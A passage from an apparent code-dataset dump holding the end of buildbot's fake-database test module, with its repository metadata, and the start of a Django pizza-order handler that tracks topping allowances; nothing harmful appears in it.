not complete and not bs['complete']:\n rv.append(self._row2dict(bs))\n else:\n rv.append(self._row2dict(bs))\n return defer.succeed(rv)\n\n def _row2dict(self, row):\n row = row.copy()\n if row['complete_at']:\n row['complete_at'] = _mkdt(row['complete_at'])\n else:\n row['complete_at'] = None\n row['submitted_at'] = row['submitted_at'] and \\\n _mkdt(row['submitted_at'])\n row['complete'] = bool(row['complete'])\n row['bsid'] = row['id']\n del row['id']\n return row\n\n def getBuildsetProperties(self, buildsetid):\n if buildsetid in self.buildsets:\n return defer.succeed(\n self.buildsets[buildsetid]['properties'])\n else:\n return defer.succeed({})\n\n # fake methods\n\n def fakeBuildsetCompletion(self, bsid, result):\n assert bsid in self.buildsets\n self.buildsets[bsid]['results'] = result\n self.completed_bsids.add(bsid)\n\n def flushBuildsets(self):\n \"\"\"\n Flush the set of buildsets, for example after C{assertBuildset}\n \"\"\"\n self.buildsets = {}\n self.completed_bsids = set()\n\n # assertions\n\n def assertBuildsets(self, count):\n \"\"\"Assert that exactly COUNT buildsets were added\"\"\"\n self.t.assertEqual(len(self.buildsets), count,\n \"buildsets are %r\" % (self.buildsets,))\n\n def assertBuildset(self, bsid, expected_buildset, expected_sourcestamps):\n \"\"\"Assert that the buildset and its attached sourcestamp look as\n expected; the ssid parameter of the buildset is omitted. Properties\n are converted with asList and sorted. Sourcestamp patches are inlined\n (patch_body, patch_level, patch_subdir), and changeids are represented\n as a set, but omitted if empty. 
If bsid is '?', then assert there is\n only one new buildset, and use that.\"\"\"\n if bsid == '?':\n self.assertBuildsets(1)\n bsid = self.buildsets.keys()[0]\n else:\n self.t.assertIn(bsid, self.buildsets)\n\n buildset = self.buildsets[bsid].copy()\n\n dictOfssDict = {}\n for sourcestamp in self.db.sourcestamps.sourcestamps.itervalues():\n if sourcestamp['sourcestampsetid'] == buildset['sourcestampsetid']:\n ssdict = sourcestamp.copy()\n ss_repository = ssdict['codebase']\n dictOfssDict[ss_repository] = ssdict\n\n if 'id' in buildset:\n del buildset['id']\n\n # clear out some columns if the caller doesn't care\n for col in 'complete complete_at submitted_at results'.split():\n if col not in expected_buildset:\n del buildset[col]\n\n if buildset['properties']:\n buildset['properties'] = sorted(buildset['properties'].items())\n\n # only add brids if we're expecting them (sometimes they're unknown)\n if 'brids' in expected_buildset:\n buildset['brids'] = self.allBuildRequests(bsid)\n\n if 'builders' in expected_buildset:\n buildset['builders'] = self.allBuildRequests(bsid).keys()\n\n for ss in dictOfssDict.itervalues():\n if 'id' in ss:\n del ss['id']\n if not ss['changeids']:\n del ss['changeids']\n\n # incorporate patch info if we have it\n if 'patchid' in ss and ss['patchid']:\n ss.update(self.db.sourcestamps.patches[ss['patchid']])\n del ss['patchid']\n\n self.t.assertEqual(\n dict(buildset=buildset, sourcestamps=dictOfssDict),\n dict(buildset=expected_buildset, sourcestamps=expected_sourcestamps))\n return bsid\n\n def allBuildsetIds(self):\n return self.buildsets.keys()\n\n def allBuildRequests(self, bsid=None):\n if bsid is not None:\n is_same_bsid = lambda br: br.buildsetid == bsid\n else:\n is_same_bsid = lambda br: True\n return dict([(br.buildername, br.id)\n for br in self.db.buildrequests.reqs.values()\n if is_same_bsid(br)])\n\n\nclass FakeBuildslavesComponent(FakeDBComponent):\n\n def setUp(self):\n self.buildslaves = []\n self.id_num = 0\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Buildslave):\n self.buildslaves.append({\n 'name': row.name,\n 'slaveid': row.id,\n 'slaveinfo': row.info\n })\n\n def getBuildslaves(self):\n return defer.succeed([{\n 'name': s['name'],\n 'slaveid': s['slaveid'],\n } for s in self.buildslaves])\n\n def getBuildslaveByName(self, name):\n buildslave = self._getBuildslaveByName(name)\n if buildslave is not None:\n # XX: make a deep-copy to avoid side effects\n buildslave = deepcopy(buildslave)\n return defer.succeed(buildslave)\n\n def _getBuildslaveByName(self, name):\n for slave in self.buildslaves:\n if slave['name'] == name:\n return slave\n return None\n\n def updateBuildslave(self, name, slaveinfo):\n slaveinfo = deepcopy(slaveinfo)\n slave = self._getBuildslaveByName(name)\n if slave is None:\n self.insertTestData([\n Buildslave(name=name, info=slaveinfo)\n ])\n else:\n slave['slaveinfo'] = slaveinfo\n return defer.succeed(None)\n\n\nclass FakeStateComponent(FakeDBComponent):\n\n def setUp(self):\n self.objects = {}\n self.states = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Object):\n self.objects[(row.name, row.class_name)] = row.id\n self.states[row.id] = {}\n\n for row in rows:\n if isinstance(row, ObjectState):\n assert row.objectid in self.objects.values()\n self.states[row.objectid][row.name] = row.value_json\n\n # component methods\n\n def _newId(self):\n id = 100\n while id in self.states:\n id += 1\n return id\n\n def getObjectId(self, name, class_name):\n try:\n id 
= self.objects[(name, class_name)]\n except:\n # invent a new id and add it\n id = self.objects[(name, class_name)] = self._newId()\n self.states[id] = {}\n return defer.succeed(id)\n\n def getState(self, objectid, name, default=object):\n try:\n json_value = self.states[objectid][name]\n except KeyError:\n if default is not object:\n return defer.succeed(default)\n raise\n return defer.succeed(json.loads(json_value))\n\n def setState(self, objectid, name, value):\n self.states[objectid][name] = json.dumps(value)\n return defer.succeed(None)\n\n # fake methods\n\n def fakeState(self, name, class_name, **kwargs):\n id = self.objects[(name, class_name)] = self._newId()\n self.objects[(name, class_name)] = id\n self.states[id] = dict((k, json.dumps(v))\n for k, v in kwargs.iteritems())\n return id\n\n # assertions\n\n def assertState(self, objectid, missing_keys=[], **kwargs):\n state = self.states[objectid]\n for k in missing_keys:\n self.t.assertFalse(k in state, \"%s in %s\" % (k, state))\n for k, v in kwargs.iteritems():\n self.t.assertIn(k, state)\n self.t.assertEqual(json.loads(state[k]), v,\n \"state is %r\" % (state,))\n\n def assertStateByClass(self, name, class_name, **kwargs):\n objectid = self.objects[(name, class_name)]\n state = self.states[objectid]\n for k, v in kwargs.iteritems():\n self.t.assertIn(k, state)\n self.t.assertEqual(json.loads(state[k]), v,\n \"state is %r\" % (state,))\n\n\nclass FakeBuildRequestsComponent(FakeDBComponent):\n\n # for use in determining \"my\" requests\n MASTER_ID = 824\n\n # override this to set reactor.seconds\n _reactor = reactor\n\n def setUp(self):\n self.reqs = {}\n self.claims = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, BuildRequest):\n self.reqs[row.id] = row\n\n if isinstance(row, BuildRequestClaim):\n self.claims[row.brid] = row\n\n # component methods\n\n def getBuildRequest(self, brid):\n try:\n return defer.succeed(self._brdictFromRow(self.reqs[brid]))\n except:\n return defer.succeed(None)\n\n @defer.inlineCallbacks\n def getBuildRequests(self, buildername=None, complete=None, claimed=None,\n bsid=None, branch=None, repository=None):\n rv = []\n for br in self.reqs.itervalues():\n if buildername and br.buildername != buildername:\n continue\n if complete is not None:\n if complete and not br.complete:\n continue\n if not complete and br.complete:\n continue\n if claimed is not None:\n claim_row = self.claims.get(br.id)\n if claimed == \"mine\":\n if not claim_row or claim_row.objectid != self.MASTER_ID:\n continue\n elif claimed:\n if not claim_row:\n continue\n else:\n if br.complete or claim_row:\n continue\n if bsid is not None:\n if br.buildsetid != bsid:\n continue\n\n if branch or repository:\n buildset = yield self.db.buildsets.getBuildset(br.buildsetid)\n sourcestamps = yield self.db.sourcestamps.getSourceStamps(buildset['sourcestampsetid'])\n\n if branch and not any(branch == s['branch'] for s in sourcestamps):\n continue\n if repository and not any(repository == s['repository'] for s in sourcestamps):\n continue\n\n rv.append(self._brdictFromRow(br))\n defer.returnValue(rv)\n\n def claimBuildRequests(self, brids, claimed_at=None, _reactor=reactor):\n for brid in brids:\n if brid not in self.reqs or brid in self.claims:\n raise buildrequests.AlreadyClaimedError\n\n claimed_at = datetime2epoch(claimed_at)\n if not claimed_at:\n claimed_at = _reactor.seconds()\n\n # now that we've thrown any necessary exceptions, get started\n for brid in brids:\n self.claims[brid] = 
BuildRequestClaim(brid=brid,\n objectid=self.MASTER_ID, claimed_at=claimed_at)\n return defer.succeed(None)\n\n def reclaimBuildRequests(self, brids, _reactor):\n for brid in brids:\n if brid in self.claims and self.claims[brid].objectid != self.MASTER_ID:\n raise buildrequests.AlreadyClaimedError\n\n # now that we've thrown any necessary exceptions, get started\n for brid in brids:\n self.claims[brid] = BuildRequestClaim(brid=brid,\n objectid=self.MASTER_ID, claimed_at=_reactor.seconds())\n return defer.succeed(None)\n\n def unclaimBuildRequests(self, brids):\n for brid in brids:\n if brid in self.claims and self.claims[brid].objectid == self.MASTER_ID:\n self.claims.pop(brid)\n return defer.succeed(None)\n\n def completeBuildRequests(self, brids, results, complete_at=None,\n _reactor=reactor):\n if complete_at is not None:\n complete_at = datetime2epoch(complete_at)\n else:\n complete_at = _reactor.seconds()\n\n for brid in brids:\n if brid not in self.reqs or self.reqs[brid].complete == 1:\n raise buildrequests.NotClaimedError\n\n for brid in brids:\n self.reqs[brid].complete = 1\n self.reqs[brid].results = results\n self.reqs[brid].complete_at = complete_at\n return defer.succeed(None)\n\n def unclaimExpiredRequests(self, old, _reactor=reactor):\n old_epoch = _reactor.seconds() - old\n\n for br in self.reqs.itervalues():\n if br.complete == 1:\n continue\n\n claim_row = self.claims.get(br.id)\n if claim_row and claim_row.claimed_at < old_epoch:\n del self.claims[br.id]\n\n # Code copied from buildrequests.BuildRequestConnectorComponent\n def _brdictFromRow(self, row):\n claimed = mine = False\n claimed_at = None\n claim_row = self.claims.get(row.id, None)\n if claim_row:\n claimed = True\n claimed_at = _mkdt(claim_row.claimed_at)\n mine = claim_row.objectid == self.MASTER_ID\n\n submitted_at = _mkdt(row.submitted_at)\n complete_at = _mkdt(row.complete_at)\n\n return dict(brid=row.id, buildsetid=row.buildsetid,\n buildername=row.buildername, priority=row.priority,\n claimed=claimed, claimed_at=claimed_at, mine=mine,\n complete=bool(row.complete), results=row.results,\n submitted_at=submitted_at, complete_at=complete_at)\n\n # fake methods\n\n def fakeClaimBuildRequest(self, brid, claimed_at=None, objectid=None):\n if objectid is None:\n objectid = self.MASTER_ID\n self.claims[brid] = BuildRequestClaim(brid=brid,\n objectid=objectid, claimed_at=self._reactor.seconds())\n\n def fakeUnclaimBuildRequest(self, brid):\n del self.claims[brid]\n\n # assertions\n\n def assertMyClaims(self, claimed_brids):\n self.t.assertEqual(\n [id for (id, brc) in self.claims.iteritems()\n if brc.objectid == self.MASTER_ID],\n claimed_brids)\n\n\nclass FakeBuildsComponent(FakeDBComponent):\n\n def setUp(self):\n self.builds = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Build):\n self.builds[row.id] = row\n\n # component methods\n\n def _newId(self):\n id = 100\n while id in self.builds:\n id += 1\n return id\n\n def getBuild(self, bid):\n row = self.builds.get(bid)\n if not row:\n return defer.succeed(None)\n\n return defer.succeed(dict(\n bid=row.id,\n brid=row.brid,\n number=row.number,\n start_time=_mkdt(row.start_time),\n finish_time=_mkdt(row.finish_time)))\n\n def getBuildsForRequest(self, brid):\n ret = []\n\n for (id, row) in self.builds.items():\n if row.brid == brid:\n ret.append(dict(bid=row.id,\n brid=row.brid,\n number=row.number,\n start_time=_mkdt(row.start_time),\n finish_time=_mkdt(row.finish_time)))\n\n return defer.succeed(ret)\n\n def addBuild(self, brid, 
number, _reactor=reactor):\n bid = self._newId()\n self.builds[bid] = Build(id=bid, number=number, brid=brid,\n start_time=_reactor.seconds, finish_time=None)\n return bid\n\n def finishBuilds(self, bids, _reactor=reactor):\n now = _reactor.seconds()\n for bid in bids:\n b = self.builds.get(bid)\n if b:\n b.finish_time = now\n return defer.succeed(None)\n\n\nclass FakeUsersComponent(FakeDBComponent):\n\n def setUp(self):\n self.users = {}\n self.users_info = {}\n self.id_num = 0\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, User):\n self.users[row.uid] = dict(identifier=row.identifier,\n bb_username=row.bb_username,\n bb_password=row.bb_password)\n\n if isinstance(row, UserInfo):\n assert row.uid in self.users\n if row.uid not in self.users_info:\n self.users_info[row.uid] = [dict(attr_type=row.attr_type,\n attr_data=row.attr_data)]\n else:\n self.users_info[row.uid].append(\n dict(attr_type=row.attr_type,\n attr_data=row.attr_data))\n\n def _user2dict(self, uid):\n usdict = None\n if uid in self.users:\n usdict = self.users[uid]\n if uid in self.users_info:\n infos = self.users_info[uid]\n for attr in infos:\n usdict[attr['attr_type']] = attr['attr_data']\n usdict['uid'] = uid\n return usdict\n\n def nextId(self):\n self.id_num += 1\n return self.id_num\n\n # component methods\n\n def findUserByAttr(self, identifier, attr_type, attr_data):\n for uid in self.users_info:\n attrs = self.users_info[uid]\n for attr in attrs:\n if (attr_type == attr['attr_type'] and\n attr_data == attr['attr_data']):\n return defer.succeed(uid)\n\n uid = self.nextId()\n self.db.insertTestData([User(uid=uid, identifier=identifier)])\n self.db.insertTestData([UserInfo(uid=uid,\n attr_type=attr_type,\n attr_data=attr_data)])\n return defer.succeed(uid)\n\n def getUser(self, uid):\n usdict = None\n if uid in self.users:\n usdict = self._user2dict(uid)\n return defer.succeed(usdict)\n\n def getUserByUsername(self, username):\n usdict = None\n for uid in self.users:\n user = self.users[uid]\n if user['bb_username'] == username:\n usdict = self._user2dict(uid)\n return defer.succeed(usdict)\n\n def updateUser(self, uid=None, identifier=None, bb_username=None,\n bb_password=None, attr_type=None, attr_data=None):\n assert uid is not None\n\n if identifier is not None:\n self.users[uid]['identifier'] = identifier\n\n if bb_username is not None:\n assert bb_password is not None\n try:\n user = self.users[uid]\n user['bb_username'] = bb_username\n user['bb_password'] = bb_password\n except KeyError:\n pass\n\n if attr_type is not None:\n assert attr_data is not None\n try:\n infos = self.users_info[uid]\n for attr in infos:\n if attr_type == attr['attr_type']:\n attr['attr_data'] = attr_data\n break\n else:\n infos.append(dict(attr_type=attr_type,\n attr_data=attr_data))\n except KeyError:\n pass\n\n return defer.succeed(None)\n\n def removeUser(self, uid):\n if uid in self.users:\n self.users.pop(uid)\n self.users_info.pop(uid)\n return defer.succeed(None)\n\n def identifierToUid(self, identifier):\n for uid in self.users:\n if identifier == self.users[uid]['identifier']:\n return defer.succeed(uid)\n return defer.succeed(None)\n\n\nclass FakeDBConnector(object):\n\n \"\"\"\n A stand-in for C{master.db} that operates without an actual database\n backend. 
This also implements a test-data interface similar to the\n L{buildbot.test.util.db.RealDatabaseMixin.insertTestData} method.\n\n The child classes implement various useful assertions and faking methods;\n see their documentation for more.\n \"\"\"\n\n def __init__(self, testcase):\n self._components = []\n self.changes = comp = FakeChangesComponent(self, testcase)\n self._components.append(comp)\n self.schedulers = comp = FakeSchedulersComponent(self, testcase)\n self._components.append(comp)\n self.sourcestampsets = comp = FakeSourceStampSetsComponent(self, testcase)\n self._components.append(comp)\n self.sourcestamps = comp = FakeSourceStampsComponent(self, testcase)\n self._components.append(comp)\n self.buildsets = comp = FakeBuildsetsComponent(self, testcase)\n self._components.append(comp)\n self.buildslaves = comp = FakeBuildslavesComponent(self, testcase)\n self._components.append(comp)\n self.state = comp = FakeStateComponent(self, testcase)\n self._components.append(comp)\n self.buildrequests = comp = FakeBuildRequestsComponent(self, testcase)\n self._components.append(comp)\n self.builds = comp = FakeBuildsComponent(self, testcase)\n self._components.append(comp)\n self.users = comp = FakeUsersComponent(self, testcase)\n self._components.append(comp)\n\n def setup(self):\n self.is_setup = True\n return defer.succeed(None)\n\n def insertTestData(self, rows):\n \"\"\"Insert a list of Row instances into the database; this method can be\n called synchronously or asynchronously (it completes immediately) \"\"\"\n for comp in self._components:\n comp.insertTestData(rows)\n return defer.succeed(None)\n\n\ndef _mkdt(epoch):\n # Local import for better encapsulation.\n from buildbot.util import epoch2datetime\n if epoch:\n return epoch2datetime(epoch)\n", "repo_name": "jollyroger/debian-buildbot", "sub_path": "buildbot/test/fake/fakedb.py", "file_name": "fakedb.py", "file_ext": "py", "file_size_in_byte": 41523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "copy.deepcopy", "line_number": 342, "usage_type": "call"}, {"api_name": "buildbot.util.json.loads", "line_number": 354, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 354, "usage_type": "name"}, {"api_name": "buildbot.util.datetime2epoch", "line_number": 378, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 388, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 388, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 392, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 392, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 393, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 393, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 399, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 399, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 401, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 401, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 408, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 408, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 413, "usage_type": "call"}, {"api_name": "twisted.internet.defer", 
"line_number": 413, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 417, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 417, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 487, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 487, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 497, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 497, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 530, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 530, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 561, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 561, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 575, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 618, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 618, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 621, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 621, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 648, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 648, "usage_type": "name"}, {"api_name": "buildbot.util.json.loads", "line_number": 668, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 668, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 680, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 693, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 693, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 697, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 701, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 701, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 705, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 705, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 707, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 707, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 719, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 719, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 736, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 736, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 739, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 739, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 847, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 847, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 856, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 857, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 857, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 866, "usage_type": "call"}, {"api_name": 
"twisted.internet.defer.succeed", "line_number": 874, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 874, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 909, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 909, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 916, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 916, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 918, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 918, "usage_type": "name"}, {"api_name": "buildbot.util.json.loads", "line_number": 918, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 918, "usage_type": "name"}, {"api_name": "buildbot.util.json.dumps", "line_number": 921, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 921, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 922, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 922, "usage_type": "name"}, {"api_name": "buildbot.util.json.dumps", "line_number": 929, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 929, "usage_type": "name"}, {"api_name": "buildbot.util.json.loads", "line_number": 941, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 941, "usage_type": "name"}, {"api_name": "buildbot.util.json.loads", "line_number": 949, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 949, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 959, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 977, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 977, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 979, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 979, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 1018, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1018, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 981, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 981, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 1020, "usage_type": "name"}, {"api_name": "buildbot.db.buildrequests.AlreadyClaimedError", "line_number": 1023, "usage_type": "attribute"}, {"api_name": "buildbot.db.buildrequests", "line_number": 1023, "usage_type": "name"}, {"api_name": "buildbot.util.datetime2epoch", "line_number": 1025, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1033, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1033, "usage_type": "name"}, {"api_name": "buildbot.db.buildrequests.AlreadyClaimedError", "line_number": 1038, "usage_type": "attribute"}, {"api_name": "buildbot.db.buildrequests", "line_number": 1038, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1044, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1044, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1050, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1050, "usage_type": "name"}, {"api_name": 
"twisted.internet.reactor", "line_number": 1053, "usage_type": "name"}, {"api_name": "buildbot.util.datetime2epoch", "line_number": 1055, "usage_type": "call"}, {"api_name": "buildbot.db.buildrequests.NotClaimedError", "line_number": 1061, "usage_type": "attribute"}, {"api_name": "buildbot.db.buildrequests", "line_number": 1061, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1067, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1067, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 1069, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1140, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1140, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1142, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1142, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1160, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1160, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 1162, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 1168, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1174, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1174, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1224, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1224, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1231, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1231, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1237, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1237, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1245, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1245, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1277, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1277, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1283, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1283, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1288, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1288, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1289, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1289, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1328, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1328, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1335, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1335, "usage_type": "name"}, {"api_name": "buildbot.util.epoch2datetime", "line_number": 1342, "usage_type": "call"}]} +{"seq_id": "5594700859", "text": "from orders.models import Order, OrderItem, OrderCounter, ToppingOrderItem, FoodOrderItem\nfrom enum import Enum\n\nTOPPING = \"Topping\"\n\n\nclass PizzaCategory(Enum):\n REGULAR_PIZZA = \"Regular pizza\"\n 
SICILIAN_PIZZA = \"Sicilian pizza\"\n\n\nclass PizzaName(Enum):\n CHEESE = \"Cheese\"\n ONE_TOPPING = \"1 topping\"\n TWO_TOPPINGS = \"2 toppings\"\n THREE_TOPPINGS = \"3 toppings\"\n SPECIAL = \"Special\"\n\n\nclass PizzaOrderHandler:\n def __init__(self):\n self.pizza = None\n\n def getCurrentPizza(self):\n return self.pizza\n\n def createPizzaOrderItem(self, order, category, name, price):\n toppingAllowance = self.getInitialToppingAllowance(name)\n self.pizza = FoodOrderItem(order=order, category=category, name=name, price=price,\n toppingAllowance=toppingAllowance, isPizza=True)\n self.pizza.save()\n\n def addTopping(self, category, name):\n if self.pizza and self.isCurrentPizzaToppable():\n self._createToppingOrderItem(category, name)\n self._decreaseToppingAllowance()\n\n def removeTopping(self, category, name):\n self._deleteToppingOrderItem(category, name)\n self._increaseToppingAllowance()\n\n def getRemainingToppingAllowance(self):\n return self.pizza.toppingAllowance\n\n def isCurrentPizzaToppable(self):\n return self.pizza.toppingAllowance > 0\n\n def _createToppingOrderItem(self, category, name):\n toppingOrderItem = ToppingOrderItem(foodOrderItem=self.pizza, category=category, name=name)\n toppingOrderItem.save()\n\n def _decreaseToppingAllowance(self):\n if self.pizza.toppingAllowance > 0:\n self.pizza.toppingAllowance -= 1\n self.pizza.save()\n\n def _deleteToppingOrderItem(self, category, name):\n toppingToRemove = ToppingOrderItem.objects.filter(category=category, name=name).last()\n toppingToRemove.delete()\n\n def _increaseToppingAllowance(self):\n self.pizza.toppingAllowance += 1\n\n @staticmethod\n def getAllPizzasToToppingsInUserOrder(order):\n pizzaToToppings = dict()\n for pizzaCategory in [PizzaCategory.REGULAR_PIZZA.value, PizzaCategory.SICILIAN_PIZZA.value]:\n pizzas = FoodOrderItem.objects.filter(order=order, category=pizzaCategory)\n for pizza in pizzas:\n pizzaToToppings[pizza] = ToppingOrderItem.objects.filter(foodOrderItem=pizza)\n\n return pizzaToToppings\n\n @staticmethod\n def getInitialToppingAllowance(pizzaName):\n toppingAllowance = 0\n if pizzaName == PizzaName.ONE_TOPPING.value:\n toppingAllowance = 1\n elif pizzaName == PizzaName.TWO_TOPPINGS.value:\n toppingAllowance = 2\n elif pizzaName == PizzaName.THREE_TOPPINGS.value:\n toppingAllowance = 3\n\n return toppingAllowance\n\n\nclass RemainingToppingAllowanceMessageGenerator:\n def __init__(self, pizzaOrderHandler):\n self.message = None\n self.pizzaOrderHandler = pizzaOrderHandler\n\n def getRemainingToppingAllowanceMessage(self, userOrder):\n latestFoodInBasket = FoodOrderItem.objects.filter(order=userOrder).last()\n if not latestFoodInBasket:\n message = \"Please order an eligible pizza to put topping on.\"\n return message\n\n isLatestFoodPizza = latestFoodInBasket.isPizza\n if isLatestFoodPizza:\n currentPizza = self.pizzaOrderHandler.getCurrentPizza()\n message = \"You can add \" + str(self.pizzaOrderHandler.getRemainingToppingAllowance()) + \" more topping(s).\"\n if currentPizza.name == PizzaName.CHEESE.value or currentPizza.name == 